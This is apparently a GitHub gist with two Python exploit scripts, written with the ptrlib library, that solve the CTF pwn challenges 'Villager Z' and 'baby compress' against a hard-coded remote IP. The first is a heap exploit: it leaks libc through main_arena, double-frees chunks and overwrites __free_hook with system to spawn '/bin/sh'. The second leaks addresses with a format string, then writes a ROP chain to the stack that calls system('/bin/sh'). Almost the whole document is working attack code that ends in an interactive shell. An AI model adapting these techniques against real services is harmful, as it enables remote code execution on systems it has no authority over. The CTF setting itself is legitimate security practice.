@ptr-yudai
Last active July 24, 2020 07:54
Villager Zとbaby compressを解くやつ
from ptrlib import *
def add(index, data):
    """Drive menu option 1: send "1", then *index*, then *data* at the service's prompts."""
    replies = (("> ", "1"), (": ", str(index)), (": ", data))
    for prompt, answer in replies:
        sock.sendlineafter(prompt, answer)
def show(index):
    """Drive menu option 5 for *index*; return the (length, content) pair the service echoes back."""
    sock.sendlineafter("> ", "5")
    sock.sendlineafter(": ", str(index))
    # Left-to-right evaluation: the length line is read and parsed before the content line.
    return int(sock.recvlineafter(": ")), sock.recvlineafter(": ")
def delete(index):
    """Drive menu option 4: send "4", then *index*, at the service's prompts."""
    for prompt, answer in (("> ", "4"), (": ", str(index))):
        sock.sendlineafter(prompt, answer)
def compress(index):
    """Drive menu option 2: send "2", then *index*, at the service's prompts."""
    for prompt, answer in (("> ", "2"), (": ", str(index))):
        sock.sendlineafter(prompt, answer)
def decompress(index):
    """Drive menu option 3: send "3", then *index*, at the service's prompts."""
    for prompt, answer in (("> ", "3"), (": ", str(index))):
        sock.sendlineafter(prompt, answer)
# ptrlib ELF wrapper for the libc.so.6 shipped with the challenge; every
# symbol/offset below is resolved against this specific build and is not
# portable to another libc.
libc = ELF("./libc.so.6")
#sock = Socket("localhost", 9999)
# Hard-coded remote host/port of the (time-limited) CTF instance; the
# commented line above is the local-test alternative the author kept.
sock = Socket("123.216.69.60", 4445)
# Entries 0-4 are created with fixed sizes tied to this binary's allocator
# behaviour; the trailing "\x31"*4 is what the author labels 0x431.
add(0, "01234567abcd" + "\x31"*4) # 0x431
add(1, "A")
add(2, "B" * 0x1c8 + "\x21")
add(3, "C" * 0x40)
add(4, "D" * 0x80)
compress(0)
delete(1)
# libc leak
add(5, "E" * 0x20)
add(6, "F" * 0x30)
add(7, "G" * 0x20)
# show() returns (length, content); the content of entry 4 is unpacked with
# ptrlib's u64 and adjusted by main_arena plus a 0x60 constant that holds
# only for this libc.so.6 — confirm before trusting the printed base.
libc_base = u64(show(4)[1]) - libc.main_arena() - 0x60
logger.info("libc = " + hex(libc_base))
# overlap killer
add(8, "1" * 0x20)
add(9, "2" * 0x20)
delete(8)
delete(8)
delete(9)
delete(8)
delete(1)
# The -10 adjustment and the 0x18/0x20 padding lengths are again specific to
# this binary/libc pair.
add(1, p64(libc_base + libc.symbol("__free_hook") - 10) + b"3" * 0x18)
add(8, "4" * 0x20)
add(2, b'///bin/sh\0' + p64(libc_base + libc.symbol("system")) * 3)
sock.interactive()
from ptrlib import *
# ptrlib ELF wrapper for the challenge's libc.so.6; the 0xf3 adjustment, the
# gadget offsets and the format-string positions below are all specific to
# this binary/libc build.
libc = ELF("./libc.so.6")
# Retry loop: each iteration opens a fresh connection and is abandoned
# (continue) unless the leaked stack address has the expected low byte.
while True:
    #sock = Socket("localhost", 9999)
    # Hard-coded remote host/port of the (time-limited) CTF instance.
    sock = Socket("123.216.69.60", 4448)
    # address leak
    payload = '%1${}c%{}$hhn%{}$p.%{}$p'.format(0xa1, 0x1d + 6, 0x25 + 6, 0x22 + 6)
    payload += 'A' * (0xe8 - len(payload))  # pad the payload to exactly 0xe8 bytes
    #payload += '\x68'
    payload += '\x88'
    sock.recvline()
    sock.send(payload)
    # NOTE(review): "\." in a non-raw string is an invalid escape sequence
    # (SyntaxWarning on recent Pythons); an r"..." literal would avoid it.
    r = sock.recvregex("0x([0-9a-f]+)\.0x([0-9a-f]+)")
    libc_base = int(r[0], 16) - libc.symbol("__libc_start_main") - 0xf3
    addr_stack = int(r[1], 16)
    logger.info("libc = " + hex(libc_base))
    logger.info("stack = " + hex(addr_stack))
    # Only the low byte of the leaked stack address is checked; any other
    # value retries with a new connection.
    if addr_stack % 0x100 != 0x90:
        logger.warn("Bad luck!")
        continue
    # get shell
    # Gadget offsets relative to libc_base, valid only for this libc.so.6.
    rop_ret = 0x00026b73
    rop_pop_rdi = 0x00026b72
    # fsb() is ptrlib's format-string builder; keyword meanings (pos, bs,
    # size, bits) follow that library — not documented here.
    payload = fsb(
        writes = {
            addr_stack + 0x08: libc_base + rop_ret,
            addr_stack + 0x10: libc_base + rop_pop_rdi,
            addr_stack + 0x18: libc_base + next(libc.find("/bin/sh")),
            addr_stack + 0x20: libc_base + libc.symbol("system"),
        },
        pos = 6,
        bs = 2,
        size = 6,
        bits = 64
    )
    sock.recvuntil("What your name?\n")
    logger.info("Good luck!")
    sock.send(payload)
    sock.recv(0x78009)
    sock.interactive()
    break